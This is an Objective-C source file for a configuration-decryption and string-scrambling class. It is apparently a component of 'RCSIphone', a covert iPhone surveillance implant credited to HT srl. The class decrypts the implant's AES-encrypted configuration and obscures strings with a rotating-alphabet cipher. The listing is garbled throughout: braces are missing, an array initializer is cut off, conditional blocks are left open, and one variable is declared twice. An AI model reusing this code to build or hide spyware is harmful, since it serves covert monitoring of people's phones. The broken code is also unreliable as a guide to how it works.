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Test Coverage
 * RCSIpony - Encryption Class
 *  This class will be responsible for all the Encryption/Decryption routines
 *  used by the Configurator
 * Created by Alfredo 'revenge' Pesoli on 20/05/2009
 * Copyright (C) HT srl 2009. All rights reserved

#import <CommonCrypto/CommonCryptor.h>
#import <zlib.h>

#import "RCSICommon.h"
#import "RCSIEncryption.h"
#import "NSMutableData+AES128.h"

//#define DEBUG
//#define DEBUG_VERBOSE_1

#pragma mark -
#pragma mark Private Interface
#pragma mark -

@interface _i_Encryption (hidden)

- (char *)_scrambleString: (char *)aString
                     seed: (u_char)aSeed
            shouldEncrypt: (BOOL)shouldEncrypt;


#pragma mark -
#pragma mark Private Implementation
#pragma mark -

@implementation _i_Encryption (hidden)

- (char *)_scrambleString: (char *)aString
                     seed: (u_char)aSeed
            shouldEncrypt: (BOOL)encryption
  char *scrambledString;
  int i, j;
  if ( !(scrambledString = strdup(aString)) )
    return NULL;
  char alphabet[ALPHABET_LEN] =
  // Avoid leaving aSeed = 0
  aSeed = (aSeed > 0) ? aSeed % ALPHABET_LEN : 1;
  for (i = 0; scrambledString[i]; i++)
      for (j = 0; j < ALPHABET_LEN; j++)
          if (scrambledString[i] == alphabet[j])
              if (encryption == YES)
                scrambledString[i] = alphabet[(j + aSeed) % ALPHABET_LEN];
                scrambledString[i] = alphabet[(j + ALPHABET_LEN - aSeed) % ALPHABET_LEN];
  return scrambledString;


#pragma mark -
#pragma mark Public Implementation
#pragma mark -

@implementation _i_Encryption : NSObject

- (id)initWithKey: (NSData *)aKey
  self = [super init];
  if (self != nil)
      mKey = aKey;
  return self;

- (NSData *)decryptConfiguration: (NSString *)aConfigurationFile
  // Quick Notes about the conf file aka monkeyz stuffz @ 1337
  //  - Skip the first 2 DWORDs
  //  - The third DWORD specifies the length of the data block
  //  - The DWORD at the end of every block is the CRC (including Length)
  //  - The DWORD after the ENDOFCONF Shit is a CRC
  //  |SkipDW|SkipDW|LenDW|DATA...|CRC|
    NSString *currentPath = [[NSFileManager defaultManager] currentDirectoryPath];
    NSFileHandle *fileHandle = [NSFileHandle fileHandleForReadingAtPath:
                              [currentPath stringByAppendingPathComponent: aConfigurationFile]];
  u_int endTokenAndCRCSize = strlen(ENDOF_CONF_DELIMITER) + sizeof(int);
  NSFileHandle *fileHandle = [NSFileHandle fileHandleForReadingAtPath: aConfigurationFile];
  // Hold the first 2 DWORDs since we'll append here the unencrypted file later on
  NSMutableData *fileData = [NSMutableData dataWithData: [fileHandle readDataOfLength: TIMESTAMP_SIZE]];
  if (fileData == nil) 
#ifdef DEBUG
      NSLog(@"decryptConfiguration: cannot open file %@", aConfigurationFile);
      return nil;
#ifdef DEBUG
      NSLog(@"decryptConfiguration: file opened");

  // Skip the first 2 DWORDs
  [fileHandle seekToFileOffset: TIMESTAMP_SIZE];
  //NSLog(@"%@", [fileHandle availableData]);
  NSMutableData *tempData = [NSMutableData dataWithData: [fileHandle availableData]];
  CCCryptorStatus result = 0;
  result = [tempData decryptWithKey: mKey];

  // TODO: Handle exceptions on subdataWithRange NSMakeRange, there's a bug on
  // configuration updates, the file won't be written completely so it will be
  // truncated
  NSLog(@"result: %d", result);
  if (result == kCCSuccess)
      [fileData appendData: tempData];
#ifdef DEBUG
      NSLog(@"File decrypted correctly");
      [fileData writeToFile: @"/private/var/mobile/RCSIphone/test.bin" atomically: YES];
      // Integrity checks
      //  - Size
      //  - END Delimeter
      //  - CRC
      u_long readFilesize;
      NSNumber *filesize;
      [fileData getBytes: &readFilesize
                   range: NSMakeRange(TIMESTAMP_SIZE, sizeof(int))];
      readFilesize += TIMESTAMP_SIZE;
      NSDictionary *fileAttributes = [[NSFileManager defaultManager] fileAttributesAtPath: aConfigurationFile
                                                                             traverseLink: YES];
      filesize = [fileAttributes objectForKey: NSFileSize];

      NSLog(@"timeStamp Size: %d", TIMESTAMP_SIZE);
      NSLog(@"EndTokeAndCRCSize: %d", endTokenAndCRCSize);
      NSLog(@"readFileSize = %d", readFilesize);
      NSLog(@"attribute = %d", [filesize intValue]);
      NSLog(@"token @ %d", readFilesize - endTokenAndCRCSize);
      // Why do we need to check the file integrity? Jeez I'm a fool
      // Anyways, there's a problem with one file since we get 3 more bytes
      // than what we expect, thus everything here fails ...
      if ((readFilesize == [filesize intValue]) ||
          (readFilesize + 3 == [filesize intValue]) || 1)
          // endToken should be at EndOfFile - CRC(DWORD) - strlen(TOKEN)
          // TODO: Sometimes here we can't find the endToken, thus we're using
          //       now the fileSize attribute instead of the readFileSize
          NSString *endToken = [[NSString alloc] initWithData: [fileData subdataWithRange:
                                                                NSMakeRange(readFilesize - endTokenAndCRCSize,
                                                                            endTokenAndCRCSize - sizeof(int))]
                                                     encoding: NSUTF8StringEncoding];
          NSLog(@"EndToken: %@", endToken);
          NSString *endOfConfDel = [[NSString alloc] initWithCString: ENDOF_CONF_DELIMITER
                                                              length: strlen(ENDOF_CONF_DELIMITER)];
          if ([endToken isEqualToString: endOfConfDel])
              // TODO: Check the crc (not crc32)
#ifdef DEBUG
              NSLog(@"readFileSize: %d", readFilesize);
              NSLog(@"fileSize: %d", [filesize intValue]);
              NSLog(@"[EE] End Token not found");
              return nil;
#ifdef DEBUG
          NSLog(@"[EE] Configuration file size mismatch");
          return nil;
#ifdef DEBUG
      NSLog(@"File decrypted correctly");
      return fileData;
#ifdef DEBUG
      switch (result)
        case kCCParamError:
          NSLog(@"Illegal parameter value");
        case kCCBufferTooSmall:
          NSLog(@"Insufficent buffer provided for specified operation.");
        case kCCMemoryFailure:
          NSLog(@"Memory allocation failure.");
        case kCCAlignmentError:
          NSLog(@"Input size was not aligned properly.");
        case kCCDecodeError:
          NSLog(@"Input data did not decode or decrypt properly.");
        case kCCUnimplemented:
          NSLog(@"Function not implemented for the current algorithm.");
      [tempData writeToFile: @"/private/var/mobile/RCSIphone/conf_decrypted_with_error.bin" atomically: YES];
#ifdef DEBUG 
      NSLog(@"Error while decrypting with key");
  return nil;

- (NSString *)scrambleForward: (NSString *)aString seed: (u_char)aSeed
  char *tempString = [self _scrambleString: (char *)[aString UTF8String]
                                      seed: aSeed
                             shouldEncrypt: YES];
  NSString *scrambledString = [[NSString alloc] initWithCString: tempString];
  return scrambledString;

- (NSString *)scrambleBackward: (NSString *)aString seed: (u_char)aSeed
  char *tempString = [self _scrambleString: (char *)[aString UTF8String]
                                      seed: aSeed
                             shouldEncrypt: NO];
  NSString *scrambledString = [[NSString alloc] initWithCString: tempString];
  return scrambledString;

#pragma mark -
#pragma mark Getter/Setter
#pragma mark -

- (NSData *)mKey
  return mKey;

- (void)setKey: (NSData *)aValue
  if (aValue != mKey)
      mKey = aValue ;
